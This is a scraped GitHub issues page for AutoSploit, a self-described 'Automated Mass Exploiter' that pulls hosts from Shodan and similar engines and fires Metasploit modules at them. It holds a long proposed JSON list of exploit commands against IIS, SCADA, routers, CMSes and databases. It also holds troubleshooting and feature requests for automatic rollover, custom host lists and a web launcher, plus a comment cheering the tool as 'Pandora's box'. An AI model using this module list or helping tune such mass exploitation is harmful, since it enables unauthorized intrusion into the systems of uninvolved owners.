nullarray / autosploit Goto Github PK
View Code? Open in Web Editor NEWAutomated Mass Exploiter
License: GNU General Public License v3.0
Automated Mass Exploiter
License: GNU General Public License v3.0
Python version number?
Python 2.7
AutoSploit version number?
AutoSploit 2.0
Any console output that is relevant to the issue:
Traceback (error) if any:
Can you please add support for https://www.zoomeye.org/ alongside Shodan.io.
Thanks
when I try ask for the gathered hosts it produces a list and fails
We should also implement a search on censys.io along with the ability to search shodan.
For example; we can give the ability to search one, or both by passing flags to the program. Core functionality will be left alone, this way we can still have that autosploitable
feel to it
It would be a good idea to add an option to load in a custom host list. Also some improvements with regards to rollover might be prudent. When an exploit fails, it is desirable that the tool automatically continues with it's normal operation.
Implement JSON format for the modules over text files:
{
"defaults": [
"use exploit/windows/firewall/blackice_pam_icq; exploit -j;",
"use exploit/windows/ftp/ms09_053_ftpd_nlst;exploit -j;",
"use exploit/windows/http/amlibweb_webquerydll_app;exploit -j;",
"use exploit/windows/http/ektron_xslt_exec_ws;exploit -j;",
"use exploit/windows/http/umbraco_upload_aspx;exploit -j;",
"use exploit/windows/iis/iis_webdav_scstoragepathfromurl;exploit -j;",
"use exploit/windows/iis/iis_webdav_upload_asp;exploit -j;",
"use exploit/windows/iis/ms01_023_printer;exploit -j;",
"use exploit/windows/iis/ms01_026_dbldecode;exploit -j;",
"use exploit/windows/iis/ms01_033_idq;exploit -j;",
"use exploit/windows/iis/ms02_018_htr;exploit -j;",
"use exploit/windows/iis/ms02_065_msadc;exploit -j;",
"use exploit/windows/iis/ms03_007_ntdll_webdav;exploit -j;",
"use exploit/windows/iis/msadc;exploit -j;",
"use exploit/windows/isapi/ms00_094_pbserver;exploit -j;",
"use exploit/windows/isapi/ms03_022_nsiislog_post;exploit -j;",
"use exploit/windows/isapi/ms03_051_fp30reg_chunked;exploit -j;",
"use exploit/windows/isapi/rsa_webagent_redirect;exploit -j;",
"use exploit/windows/isapi/w3who_query;exploit -j;",
"use exploit/windows/scada/advantech_webaccess_dashboard_file_upload;exploit -j;",
"use exploit/windows/ssl/ms04_011_pct;exploit -j;",
"use exploit/freebsd/http/watchguard_cmd_exec;exploit -j; ",
"use exploit/linux/http/alienvault_exec;exploit -j; ",
"use exploit/linux/http/alienvault_sqli_exec;exploit -j; ",
"use exploit/linux/http/astium_sqli_upload;exploit -j; ",
"use exploit/linux/http/centreon_sqli_exec;exploit -j; ",
"use exploit/linux/http/centreon_useralias_exec;exploit -j; ",
"use exploit/linux/http/crypttech_cryptolog_login_exec;exploit -j; ",
"use exploit/linux/http/dolibarr_cmd_exec;exploit -j; ",
"use exploit/linux/http/goautodial_3_rce_command_injection;exploit -j;",
"use exploit/linux/http/kloxo_sqli;exploit -j; ",
"use exploit/linux/http/nagios_xi_chained_rce;exploit -j; ",
"use exploit/linux/http/netgear_wnr2000_rce;exploit -j; ",
"use exploit/linux/http/pandora_fms_sqli;exploit -j; ",
"use exploit/linux/http/riverbed_netprofiler_netexpress_exe;exploit -j; ",
"use exploit/linux/http/wd_mycloud_multiupload_upload;exploit -j; ",
"use exploit/linux/http/zabbix_sqli;exploit -j; ",
"use exploit/linux/misc/qnap_transcode_server;exploit -j; ",
"use exploit/linux/mysql/mysql_yassl_getname;exploit -j; ",
"use exploit/linux/mysql/mysql_yassl_hello;exploit -j; ",
"use exploit/linux/postgres/postgres_payload;exploit -j; ",
"use exploit/linux/samba/is_known_pipename;exploit -j; ",
"use exploit/multi/browser/java_jre17_driver_manager;exploit -j; ",
"use exploit/multi/http/atutor_sqli;exploit -j; ",
"use exploit/multi/http/dexter_casinoloader_exec;exploit -j; ",
"use exploit/multi/http/drupal_drupageddon;exploit -j; ",
"use exploit/multi/http/manage_engine_dc_pmp_sqli;exploit -j; ",
"use exploit/multi/http/manageengine_search_sqli;exploit -j; ",
"use exploit/multi/http/movabletype_upgrade_exec;exploit -j; ",
"use exploit/multi/http/php_volunteer_upload_exe;exploit -j; ",
"use exploit/multi/http/sonicwall_scrutinizer_methoddetail_sqli;exploit -j; ",
"use exploit/multi/http/splunk_mappy_exec;exploit -j; ",
"use exploit/multi/http/testlink_upload_exec;exploit -j; ",
"use exploit/multi/http/zpanel_information_disclosure_rce;exploit -j; ",
"use exploit/multi/misc/legend_bot_exec;exploit -j; ",
"use exploit/multi/mysql/mysql_udf_payload;exploit -j; ",
"use exploit/multi/postgres/postgres_createlang;exploit -j; ",
"use exploit/solaris/sunrpc/ypupdated_exec;exploit -j; ",
"use exploit/unix/ftp/proftpd_133c_backdoor;exploit -j; ",
"use exploit/unix/http/tnftp_savefile;exploit -j; ",
"use exploit/unix/webapp/joomla_contenthistory_sqli_rce;exploit -j; ",
"use exploit/unix/webapp/kimai_sqli;exploit -j; ",
"use exploit/unix/webapp/openemr_sqli_privesc_upload;exploit -j; ",
"use exploit/unix/webapp/seportal_sqli_exec;exploit -j; ",
"use exploit/unix/webapp/vbulletin_vote_sqli_exec;exploit -j; ",
"use exploit/unix/webapp/vicidial_manager_send_cmd_exec;exploit -j;",
"use exploit/windows/antivirus/symantec_endpoint_manager_rce;exploit -j; ",
"use exploit/windows/http/apache_mod_rewrite_ldap;exploit -j; ",
"use exploit/windows/http/ca_totaldefense_regeneratereports;exploit -j;",
"use exploit/windows/http/cyclope_ess_sqli;exploit -j;",
"use exploit/windows/http/hp_mpa_job_acct;exploit -j;",
"use exploit/windows/http/solarwinds_storage_manager_sql;exploit -j;",
"use exploit/windows/http/sonicwall_scrutinizer_sql;exploit -j;",
"use exploit/windows/misc/altiris_ds_sqli;exploit -j; ",
"use exploit/windows/misc/fb_cnct_group;exploit -j; ",
"use exploit/windows/misc/lianja_db_net;exploit -j; ",
"use exploit/windows/misc/manageengine_eventlog_analyzer_rce;exploit -j; ",
"use exploit/windows/mssql/lyris_listmanager_weak_pass;exploit -j; ",
"use exploit/windows/mssql/ms02_039_slammer;exploit -j; ",
"use exploit/windows/mssql/ms09_004_sp_replwritetovarbin;exploit -j; ",
"use exploit/windows/mssql/ms09_004_sp_replwritetovarbin_sqli;exploit -j; ",
"use exploit/windows/mssql/mssql_linkcrawler;exploit -j; ",
"use exploit/windows/mssql/mssql_payload;exploit -j; ",
"use exploit/windows/mssql/mssql_payload_sqli;exploit -j; ",
"use exploit/windows/mysql/mysql_mof;exploit -j; ",
"use exploit/windows/mysql/mysql_start_up;exploit -j; ",
"use exploit/windows/mysql/mysql_yassl_hello;exploit -j;",
"use exploit/windows/mysql/scrutinizer_upload_exec;exploit -j; ",
"use exploit/windows/postgres/postgres_payload;exploit -j; ",
"use exploit/windows/scada/realwin_on_fcs_login;exploit -j;",
"use exploit/multi/http/rails_actionpack_inline_exec;exploit -j;",
"use exploit/multi/http/rails_dynamic_render_code_exec;exploit -j;",
"use exploit/multi/http/rails_json_yaml_code_exec;exploit -j;",
"use exploit/multi/http/rails_secret_deserialization;exploit -j;",
"use exploit/multi/http/rails_web_console_v2_code_exec;exploit -j;",
"use exploit/multi/http/rails_xml_yaml_code_exec;exploit -j;",
"use exploit/multi/http/rocket_servergraph_file_requestor_rce;exploit -j;",
"use exploit/multi/http/phpmoadmin_exec;exploit -j;",
"use exploit/multi/http/phpmyadmin_3522_backdoor;exploit -j;",
"use exploit/multi/http/phpmyadmin_preg_replace;exploit -j;",
"use exploit/multi/http/phpscheduleit_start_date;exploit -j;",
"use exploit/multi/http/phptax_exec;exploit -j;",
"use exploit/multi/http/phpwiki_ploticus_exec;exploit -j;",
"use exploit/multi/http/plone_popen2;exploit -j;",
"use exploit/multi/http/pmwiki_pagelist;exploit -j;",
"use exploit/multi/http/joomla_http_header_rce;exploit -j;",
"use exploit/multi/http/novell_servicedesk_rce;exploit -j;",
"use exploit/multi/http/oracle_reports_rce;exploit -j;",
"use exploit/multi/http/php_utility_belt_rce;exploit -j;",
"use exploit/multi/http/phpfilemanager_rce;exploit -j;",
"use exploit/multi/http/processmaker_exec;exploit -j;",
"use exploit/multi/http/rocket_servergraph_file_requestor_rce;exploit -j;",
"use exploit/multi/http/spree_search_exec;exploit -j;",
"use exploit/multi/http/spree_searchlogic_exec;exploit -j;",
"use exploit/multi/http/struts_code_exec_parameters;exploit -j;",
"use exploit/multi/http/vtiger_install_rce;exploit -j;",
"use exploit/multi/http/werkzeug_debug_rce;exploit -j;",
"use exploit/multi/http/zemra_panel_rce;exploit -j;",
"use exploit/multi/http/zpanel_information_disclosure_rce;exploit -j;",
"use exploit/multi/http/joomla_http_header_rce;exploit -j;",
"use exploit/unix/webapp/joomla_akeeba_unserialize;exploit -j;",
"use exploit/unix/webapp/joomla_comjce_imgmanager;exploit -j;",
"use exploit/unix/webapp/joomla_contenthistory_sqli_rce;exploit -j;",
"use exploit/unix/webapp/joomla_media_upload_exec;exploit -j;",
"use exploit/multi/http/builderengine_upload_exec;exploit -j;",
"use exploit/multi/http/caidao_php_backdoor_exec;exploit -j;",
"use exploit/multi/http/atutor_sqli;exploit -j; ",
"use exploit/multi/http/ajaxplorer_checkinstall_exec;exploit -j;",
"use exploit/multi/http/apache_activemq_upload_jsp;exploit -j; ",
"use exploit/unix/webapp/wp_lastpost_exec;exploit -j; ",
"use exploit/unix/webapp/wp_mobile_detector_upload_execute;exploit -j;",
"use exploit/multi/http/axis2_deployer;exploit -j;",
"use exploit/unix/webapp/wp_foxypress_upload;exploit -j;",
"use exploit/linux/http/tr064_ntpserver_cmdinject;exploit -j;",
"use exploit/linux/misc/quest_pmmasterd_bof;exploit -j;",
"use exploit/multi/http/wp_ninja_forms_unauthenticated_file_upload;exploit -j;",
"use exploit/unix/webapp/php_xmlrpc_eval;exploit -j;",
"use exploit/unix/webapp/wp_admin_shell_upload;exploit -j;",
"use exploit/linux/http/sophos_wpa_sblistpack_exec;exploit -j;",
"use exploit/linux/local/sophos_wpa_clear_keys;exploit -j;",
"use exploit/multi/http/zpanel_information_disclosure_rce;exploit -j;",
"use auxiliary/admin/cisco/cisco_asa_extrabacon;exploit -j;",
"use auxiliary/admin/cisco/cisco_secure_acs_bypass;exploit -j;",
"use auxiliary/admin/cisco/vpn_3000_ftp_bypass;exploit -j;",
"use exploit/bsdi/softcart/mercantec_softcart;exploit -j; ",
"use exploit/freebsd/misc/citrix_netscaler_soap_bof;exploit -j;",
"use exploit/freebsd/samba/trans2open;exploit -j;",
"use exploit/linux/ftp/proftp_sreplace;exploit -j; ",
"use exploit/linux/http/dcos_marathon;exploit -j;",
"use exploit/linux/http/f5_icall_cmd;exploit -j;",
"use exploit/linux/http/fritzbox_echo_exec;exploit -j;",
"use exploit/linux/http/gitlist_exec;exploit -j;",
"use exploit/linux/http/goautodial_3_rce_command_injection;exploit -j;",
"use exploit/linux/http/ipfire_bashbug_exec;exploit -j;",
"use exploit/linux/http/ipfire_oinkcode_exec;exploit -j;",
"use exploit/linux/http/ipfire_proxy_exec;exploit -j;",
"use exploit/linux/http/kaltura_unserialize_rce;exploit -j;",
"use exploit/linux/http/lifesize_uvc_ping_rce;exploit -j;",
"use exploit/linux/http/nagios_xi_chained_rce;exploit -j;",
"use exploit/linux/http/netgear_dgn1000_setup_unauth_exec;exploit -j;",
"use exploit/linux/http/netgear_wnr2000_rce ;exploit -j;",
"use exploit/linux/http/nuuo_nvrmini_auth_rce;exploit -j;",
"use exploit/linux/http/nuuo_nvrmini_unauth_rce;exploit -j;",
"use exploit/linux/http/op5_config_exec;exploit -j;",
"use exploit/linux/http/pandora_fms_exec;exploit -j;",
"use exploit/linux/http/pineapple_preconfig_cmdinject;exploit -j;",
"use exploit/linux/http/seagate_nas_php_exec_noauth;exploit -j;",
"use exploit/linux/http/symantec_messaging_gateway_exec;exploit -j;",
"use exploit/linux/http/trendmicro_imsva_widget_exec;exploit -j;",
"use exploit/linux/http/trueonline_billion_5200w_rce;exploit -j;",
"use exploit/linux/http/trueonline_p660hn_v1_rce;exploit -j;",
"use exploit/linux/http/trueonline_p660hn_v2_rce;exploit -j;",
"use exploit/linux/http/vcms_upload;exploit -j;",
"use exploit/linux/misc/lprng_format_string;exploit -j;",
"use exploit/linux/misc/mongod_native_helper;exploit -j;",
"use exploit/linux/misc/ueb9_bpserverd;exploit -j;",
"use exploit/linux/mysql/mysql_yassl_getname;exploit -j;",
"use exploit/linux/pop3/cyrus_pop3d_popsubfolders;exploit -j;",
"use exploit/linux/postgres/postgres_payload;exploit -j;",
"use exploit/linux/pptp/poptop_negative_read;exploit -j;",
"use exploit/linux/proxy/squid_ntlm_authenticate;exploit -j;",
"use exploit/linux/samba/lsa_transnames_heap;exploit -j;",
"use exploit/linux/samba/setinfopolicy_heap;exploit -j;",
"use exploit/linux/samba/trans2open;exploit -j;",
"use exploit/multi/elasticsearch/script_mvel_rce;exploit -j;",
"use exploit/multi/elasticsearch/search_groovy_script;exploit -j;",
"use exploit/multi/http/atutor_sqli;exploit -j;",
"use exploit/multi/http/axis2_deployer;exploit -j;",
"use exploit/multi/http/familycms_less_exe;exploit -j;",
"use exploit/multi/http/freenas_exec_raw;exploit -j;",
"use exploit/multi/http/gestioip_exec;exploit -j;",
"use exploit/multi/http/glassfish_deployer;exploit -j;",
"use exploit/multi/http/glpi_install_rce;exploit -j;",
"use exploit/multi/http/joomla_http_header_rce;exploit -j; ",
"use exploit/multi/http/makoserver_cmd_exec;exploit -j;",
"use exploit/multi/http/novell_servicedesk_rc;exploit -j;",
"use exploit/multi/http/oracle_reports_rce;exploit -j;",
"use exploit/multi/http/php_utility_belt_rce;exploit -j;",
"use exploit/multi/http/phpfilemanager_rce;exploit -j;",
"use exploit/multi/http/phpmyadmin_3522_backdoor;exploit -j;",
"use exploit/multi/http/phpwiki_ploticus_exec;exploit -j;",
"use exploit/multi/http/processmaker_exec;exploit -j;",
"use exploit/multi/http/rails_actionpack_inline_exec;exploit -j;",
"use exploit/multi/http/rails_dynamic_render_code_exec;exploit -j;",
"use exploit/multi/http/rails_secret_deserialization;exploit -j;",
"use exploit/multi/http/rocket_servergraph_file_requestor_rce;exploit -j;",
"use exploit/multi/http/simple_backdoors_exec;exploit -j;",
"use exploit/multi/http/spree_search_exec;exploit -j;",
"use exploit/multi/http/spree_searchlogic_exec;exploit -j;",
"use exploit/multi/http/struts2_rest_xstream;exploit -j;",
"use exploit/multi/http/struts_code_exec;exploit -j;",
"use exploit/multi/http/struts_code_exec_classloader;exploit -j;",
"use exploit/multi/http/struts_code_exec_parameters;exploit -j;",
"use exploit/multi/http/struts_dev_mode;exploit -j;",
"use exploit/multi/http/sysaid_auth_file_upload;exploit -j;",
"use exploit/multi/http/tomcat_jsp_upload_bypass;exploit -j;",
"use exploit/multi/http/vtiger_install_rce;exploit -j;",
"use exploit/multi/http/werkzeug_debug_rce;exploit -j;",
"use exploit/multi/http/zemra_panel_rce;exploit -j;",
"use exploit/multi/http/zpanel_information_disclosure_rce;exploit -j;",
"use exploit/multi/ids/snort_dce_rpc;exploit -j;",
"use exploit/multi/misc/batik_svg_java;exploit -j;",
"use exploit/multi/misc/pbot_exec;exploit -j;",
"use exploit/multi/misc/veritas_netbackup_cmdexec;exploit -j;",
"use exploit/multi/mysql/mysql_udf_payload;exploit -j;",
"use exploit/multi/php/php_unserialize_zval_cookie;exploit -j;",
"use exploit/unix/http/freepbx_callmenum;exploit -j;",
"use exploit/unix/http/lifesize_room;exploit -j;",
"use exploit/unix/http/pfsense_clickjacking;exploit -j;",
"use exploit/unix/http/pfsense_group_member_exec;exploit -j;",
"use exploit/unix/http/tnftp_savefile;exploit -j;",
"use exploit/unix/misc/polycom_hdx_traceroute_exec;exploit -j;",
"use exploit/unix/webapp/awstats_migrate_exec;exploit -j;",
"use exploit/unix/webapp/carberp_backdoor_exec;exploit -j;",
"use exploit/unix/webapp/citrix_access_gateway_exec;exploit -j;",
"use exploit/unix/webapp/dogfood_spell_exec;exploit -j;",
"use exploit/unix/webapp/invision_pboard_unserialize_exec;exploit -j;",
"use exploit/unix/webapp/joomla_contenthistory_sqli_rce;exploit -j;",
"use exploit/unix/webapp/mybb_backdoor;exploit -j;",
"use exploit/unix/webapp/opensis_modname_exec;exploit -j;",
"use exploit/unix/webapp/oscommerce_filemanager;exploit -j;",
"use exploit/unix/webapp/piwik_superuser_plugin_upload;exploit -j;",
"use exploit/unix/webapp/tikiwiki_upload_exec;exploit -j;",
"use exploit/unix/webapp/webtester_exec;exploit -j;",
"use exploit/unix/webapp/wp_phpmailer_host_header;exploit -j;",
"use exploit/unix/webapp/wp_total_cache_exec;exploit -j;",
"use exploit/windows/antivirus/symantec_endpoint_manager_rce;exploit -j;",
"use exploit/windows/http/ektron_xslt_exec;exploit -j;",
"use exploit/windows/http/ektron_xslt_exec_ws;exploit -j;",
"use exploit/windows/http/geutebrueck_gcore_x64_rce_bo;exploit -j;",
"use exploit/windows/http/hp_autopass_license_traversal;exploit -j;",
"use exploit/windows/http/manage_engine_opmanager_rce;exploit -j;",
"use exploit/windows/http/netgear_nms_rce;exploit -j;",
"use exploit/windows/http/sepm_auth_bypass_rce;exploit -j;",
"use exploit/windows/http/trendmicro_officescan_widget_exec;exploit -j;",
"use exploit/windows/iis/iis_webdav_upload_asp;exploit -j;",
"use exploit/windows/iis/msadc;exploit -j;",
"use exploit/windows/misc/manageengine_eventlog_analyzer_rce;exploit -j;",
"use exploit/windows/novell/file_reporter_fsfui_upload;exploit -j;",
"use exploit/windows/scada/ge_proficy_cimplicity_gefebt;exploit -j;",
"use exploit/windows/smb/ipass_pipe_exec;exploit -j;",
"use exploit/windows/smb/smb_relay;exploit -j;",
"use auxiliary/sqli/oracle/jvm_os_code_10g;exploit -j;",
"use auxiliary/sqli/oracle/jvm_os_code_11g;exploit -j;",
"use auxiliary/fuzzers/dns/dns_fuzzer;exploit -j;",
"use auxiliary/fuzzers/ftp/client_ftp;exploit -j;",
"use auxiliary/fuzzers/ftp/ftp_pre_post;exploit -j;",
"use auxiliary/fuzzers/http/http_form_field;exploit -j;",
"use auxiliary/fuzzers/http/http_get_uri_long;exploit -j;",
"use auxiliary/fuzzers/http/http_get_uri_strings;exploit -j;",
"use auxiliary/fuzzers/ntp/ntp_protocol_fuzzer;exploit -j;",
"use auxiliary/fuzzers/smb/smb2_negotiate_corrupt;exploit -j;",
"use auxiliary/fuzzers/smb/smb_create_pipe;exploit -j;",
"use auxiliary/fuzzers/smb/smb_create_pipe_corrupt;exploit -j;",
"use auxiliary/fuzzers/smb/smb_negotiate_corrupt;exploit -j; ",
"use auxiliary/fuzzers/smb/smb_ntlm1_login_corrupt;exploit -j;",
"use auxiliary/fuzzers/smb/smb_tree_connect;exploit -j;",
"use auxiliary/fuzzers/smb/smb_tree_connect_corrupt;exploit -j;",
"use auxiliary/fuzzers/smtp/smtp_fuzzer;exploit -j;",
"use auxiliary/fuzzers/ssh/ssh_kexinit_corrupt;exploit -j;",
"use auxiliary/fuzzers/ssh/ssh_version_15;exploit -j;",
"use auxiliary/fuzzers/ssh/ssh_version_2;exploit -j;",
"use auxiliary/fuzzers/ssh/ssh_version_corrupt;exploit -j;",
"use auxiliary/fuzzers/tds/tds_login_corrupt;exploit -j;",
"use auxiliary/fuzzers/tds/tds_login_username;exploit -j;"
]
}
JSON is easier to deal with, and this way people can implement their own into the file easily. Or we could accept JSON formatted files with a list of modules (as above) for personal exploits.
good day.i successfully setup the tool an installed all dependencies smoothly.i also registered in shodan and collected my api key. when i put the api key ,it registers ok. when i select option 2 gather, it generates this error [!]Critical. An error was raised with the following error message.
Invalid API key
. any solutions.thanks
[←[1m←[32m+←[0m] checking for services
Traceback (most recent call last):
File "autosploit.py", line 5, in <module>
main()
File "C:\Users\Nick\AutoSploit\autosploit\main.py", line 32, in main
if not check_services(service):
File "C:\Users\Nick\AutoSploit\lib\settings.py", line 94, in check_services
all_processes.add(" ".join(running_proc.cmdline()).strip())
File "C:\Python27\lib\site-packages\psutil\__init__.py", line 712, in cmdline
return self._proc.cmdline()
File "C:\Python27\lib\site-packages\psutil\_pswindows.py", line 639, in wrapper
raise AccessDenied(self.pid, self._name)
psutil.AccessDenied: psutil.AccessDenied (pid=312)
Privately reported
[-] Exploit failed: The following options failed to validate: RHOST.
Exploit is getting failed due to Rhost, When i set the Rhost manually its working fine.
after selecting 2nd option the below error raised
[!]Critical. An error was raised with the following error message.
The search request timed out.
We need some README translations, if you know another language and the translation is not already in here, and you feel like being my hero, go ahead and make a pull request for one.
Translations need to follow the guidelines below;
Get to it guys!
I have found an error during the execution of AutoSploit .
The error is as shown below.
C:\GitHub\AutoSploit>python autosploit.py
Traceback (most recent call last):
File "autosploit.py", line 11, in
from blessings import Terminal
File "C:\Python27\lib\site-packages\blessings_init_.py", line 5, in
import curses
File "C:\Python27\lib\curses_init_.py", line 15, in
from _curses import *
ImportError: No module named _curses
C:\GitHub\AutoSploit>
My machine configuration is as below.
OS version : Windows 10 Home 64bit,
Python version : python-2.7.14 [C:\Python27]
Metasploit Framework version : Metasploit Framework-latest [C:\metasploit-framework]
Cloned AutoSploit : C:\GitHub\AutoSploit
Windows Defender : Disabled
Could someone can help me with this error?
Regards,
i have error in here,,
[_root@autosploit# 4
------------------------------
[?] enter the host IP you wish to add: xx.xx.xx.xxx
Traceback (most recent call last):
File "autosploit.py", line 5, in <module>
main()
File "/root/AutoSploit/autosploit/main.py", line 58, in main
terminal.terminal_main_display(loaded_exploits)
File "/root/AutoSploit/lib/term/terminal.py", line 277, in terminal_main_display
self.add_single_host()
File "/root/AutoSploit/lib/term/terminal.py", line 94, in add_single_host
with open(self.host_path, "a+") as hosts:
TypeError: coercing to Unicode: need string or buffer, list found_
root@KALI:~/Desktop/AutoSploit-2.0# python autosploit.py
Traceback (most recent call last):
File "autosploit.py", line 1, in
from autosploit.main import main
File "/root/Desktop/AutoSploit-2.0/autosploit/main.py", line 3, in
from lib.cmdline.cmd import AutoSploitParser
File "/root/Desktop/AutoSploit-2.0/lib/cmdline/cmd.py", line 9, in
import api_calls.censys
File "/root/Desktop/AutoSploit-2.0/api_calls/censys.py", line 1, in
import requests
File "/usr/local/lib/python2.7/dist-packages/requests/init.py", line 84, in
from urllib3.contrib import pyopenssl
File "/usr/local/lib/python2.7/dist-packages/urllib3/contrib/pyopenssl.py", line 46, in
import OpenSSL.SSL
File "/usr/local/lib/python2.7/dist-packages/OpenSSL/init.py", line 8, in
from OpenSSL import rand, crypto, SSL
File "/usr/local/lib/python2.7/dist-packages/OpenSSL/crypto.py", line 12, in
from cryptography import x509
File "/usr/local/lib/python2.7/dist-packages/cryptography/x509/init.py", line 8, in
from cryptography.x509.base import (
File "/usr/local/lib/python2.7/dist-packages/cryptography/x509/base.py", line 16, in
from cryptography.x509.extensions import Extension, ExtensionType
File "/usr/local/lib/python2.7/dist-packages/cryptography/x509/extensions.py", line 24, in
from cryptography.x509.general_name import GeneralName, IPAddress, OtherName
File "/usr/local/lib/python2.7/dist-packages/cryptography/x509/general_name.py", line 18, in
from cryptography.x509.name import Name
File "/usr/local/lib/python2.7/dist-packages/cryptography/x509/name.py", line 28, in
_ASN1_TYPE_TO_ENUM = dict((i.value, i) for i in _ASN1Type)
TypeError: 'type' object is not iterable
Change RHOSTS to RHOST
help me for errors
root@kali:/Desktop/exploits# git clone https://github.com/NullArray/AutoSploit.git/Desktop/exploits# cd AutoSploit
Cloning into 'AutoSploit'...
remote: Counting objects: 586, done.
remote: Compressing objects: 100% (50/50), done.
remote: Total 586 (delta 35), reused 73 (delta 30), pack-reused 501
Receiving objects: 100% (586/586), 245.03 KiB | 560.00 KiB/s, done.
Resolving deltas: 100% (269/269), done.
...................................................................................................
root@kali:
root@kali:/Desktop/exploits/AutoSploit# ls/Desktop/exploits/AutoSploit# chmod 777 autosploit.py
api_calls autosploit.py Docker lib README.md requirements.txt
autosploit CONTRIBUTING.md etc LICENSE README-zh.md
root@kali:
root@kali:/Desktop/exploits/AutoSploit# chmod 777 requirements.txt/Desktop/exploits/AutoSploit# pip install requirements.txt
root@kali:
Collecting requirements.txt
Could not find a version that satisfies the requirement requirements.txt (from versions: )
.............................................................................................
No matching distribution found for requirements.txt
root@kali:/Desktop/exploits/AutoSploit# pip install shodan/Desktop/exploits/AutoSploit# pip install blessings
Requirement already satisfied: shodan in /usr/local/lib/python2.7/dist-packages
Requirement already satisfied: requests>=2.2.1 in /usr/lib/python2.7/dist-packages (from shodan)
Requirement already satisfied: click in /usr/lib/python2.7/dist-packages (from shodan)
Requirement already satisfied: click-plugins in /usr/local/lib/python2.7/dist-packages (from shodan)
Requirement already satisfied: colorama in /usr/lib/python2.7/dist-packages (from shodan)
Requirement already satisfied: XlsxWriter in /usr/lib/python2.7/dist-packages (from shodan)
.....................................................................................
root@kali:
Requirement already satisfied: blessings in /usr/local/lib/python2.7/dist-packages
root@kali:/Desktop/exploits/AutoSploit# ls/Desktop/exploits/AutoSploit# python autosploit.py
api_calls autosploit autosploit.py CONTRIBUTING.md Docker etc lib LICENSE README.md README-zh.md requirements.txt
root@kali:
..........................................................................................
Traceback (most recent call last):
File "autosploit.py", line 1, in
from autosploit.main import main
File "/root/Desktop/exploits/AutoSploit/autosploit/main.py", line 3, in
from lib.cmdline.cmd import AutoSploitParser
File "/root/Desktop/exploits/AutoSploit/lib/cmdline/cmd.py", line 7, in
import lib.jsonize
File "/root/Desktop/exploits/AutoSploit/lib/jsonize.py", line 7, in
import lib.settings
File "/root/Desktop/exploits/AutoSploit/lib/settings.py", line 11, in
import psutil
ImportError: No module named psutil
root@kali:~/Desktop/exploits/AutoSploit#
cloned latest repo but the problem regarding RHOST remains the same as per described in earlier tickets.
Secondly, no exit path for failed exploitation as it continues to test every module on any given target of hosts.txt
If you look here: https://github.com/NullArray/AutoSploit/blob/dev-beta/etc/scripts/start_services.sh#L16 you'll notice that brew
is used. AutoSploit requires (on most devices) the user to run as root.Brew
is designed by default to not run as root, as to not break macOS built-in integrity protection (because Apple likes to be difficult as fuck). If anybody has another installation method on how to get PostgreSQL downloaded and run onto the users system during the installation it would be greatly appreciated!
Python
Problem nr1 with Python
This is the "error":
[+] welcome to autosploit, give us a little bit while we configure
[+] checking for services
Traceback (most recent call last):
File "autosploit.py", line 5, in
main()
File "/data/data/com.termux/files/home/AutoSploit/autosploit/main.py", line 33, in main
choice = prompt("it appears that service {} is not enabled, would you like us to enable it for you[y/N]".format(service))
File "/data/data/com.termux/files/home/AutoSploit/lib/output.py", line 10, in prompt
question = raw_input(
NameError: name 'raw_input' is not defined
Python2
The problem that I get when I try python2 autosploit.py
The "error":
python2 autosploit.py
Traceback (most recent call last):
File "autosploit.py", line 1, in
from autosploit.main import main
File "/data/data/com.termux/files/home/AutoSploit/autosploit/main.py", line 3, in
from lib.cmdline.cmd import AutoSploitParser
File "/data/data/com.termux/files/home/AutoSploit/lib/cmdline/cmd.py", line 7, in
import lib.jsonize
File "/data/data/com.termux/files/home/AutoSploit/lib/jsonize.py", line 7, in
import lib.settings
File "/data/data/com.termux/files/home/AutoSploit/lib/settings.py", line 11, in
import psutil
ImportError: No module named psutil
Is it possible to notify users of a vulnerability that doesn’t have a public exploit (cvedetails.com, cve.mitre.org) and also if there’s an exploit that’s public but that’s not in the MSF (exploit-db.com) so users can add it to MSF.
Do I maybe have the wrong directory for msfconsole?
Change Apache to apache2 that way it will be defiant to pick it up
https://github.com/NullArray/AutoSploit/blob/master/autosploit/main.py#L30
We have been discussing some installation methods to fix our rollover issue (issue #55) and have come up with a potential solution, this will bring in a problem with installation though. So we as a team have decided to give this option to the community.
sudo bash configure.sh
sudo -s << EOF
git clone <LINK>
sudo pip2 install msgpack
cd msfrpc/python-msfrpc
python setup.py install
mkdir /opt
cd /opt
git clone autosploit
cd /opt/autosploit
pip2 install - r reqs.txt
EOF
Leave your comment here, you can also vote on our poll on Twitter or on our Discord server
Either way the configuration for the program will be done automatically, but how you want it to be done is up to you.
Am getting this after "python autosploit.py"
File "autosploit.py", line 24
print t.cyan("""
^
SyntaxError: invalid syntax
Need to change “agent” to “User-Agent”. “Agent” will not implement the user agent string
https://github.com/NullArray/AutoSploit/blob/master/api_calls/zoomeye.py#L70
I think, it will be useful to add small programming style convention document for contributors.
Such as:
1. Usage And Legal
2. Gather Hosts
3. Custom Hosts
4. Add Single Host
5. View Gathered Hosts
6. Exploit Gathered Hosts
99. Quit
root@autosploit# 3
------------------------------
[?] enter the full path to your host file: <IP>
[?] specify full path to a whitelist file, otherwise hit enter:
Traceback (most recent call last):
File "autosploit.py", line 5, in <module>
main()
File "/Users/admin/bin/python/autosploit/autosploit/main.py", line 86, in main
terminal.terminal_main_display(loaded_exploits)
File "/Users/admin/bin/python/autosploit/lib/term/terminal.py", line 291, in terminal_main_display
self.custom_host_list(loaded_mods)
File "/Users/admin/bin/python/autosploit/lib/term/terminal.py", line 238, in custom_host_list
self.exploit_gathered_hosts(mods, hosts=provided_host_file)
File "/Users/admin/bin/python/autosploit/lib/term/terminal.py", line 184, in exploit_gathered_hosts
host_file = open(hosts).readlines()
IOError: [Errno 2] No such file or directory: '<IP>'
The default suggestion is 'IIS', I'm just curious what others are searching for via shodan.
@NullArray if you don't want this here, feel free to remove it.
I have run shodan init and even tried to put the api key into the autosploit.py file but i still get the following error:
[+]Please stand by while results are being collected...
[!]Critical. An error was raised with the following error message.
Invalid API key
Is there a way to automate the rollover to the next exploit when one fails? Right now that part of this tool is not very auto, unless I'm missing something.
What about giving a web interface for this project, so it could be launched via the internet? I have some free servers if they would help?
You realize you just opened Pandora’s box on every able body in the world right? I love it, keep it up man.
getting while trying to gather hosts from shodan. not searching, not creating hosts.txt
When I try to run the: python autosploit.py install
I get this message:
$ python autosploit.py install
Traceback (most recent call last):
File "autosploit.py", line 8, in
from blessings import Terminal
File "C:\Python27\lib\site-packages\blessings_init_.py", line 5, in
import curses
File "C:\Python27\lib\curses_init_.py", line 15, in
from _curses import *
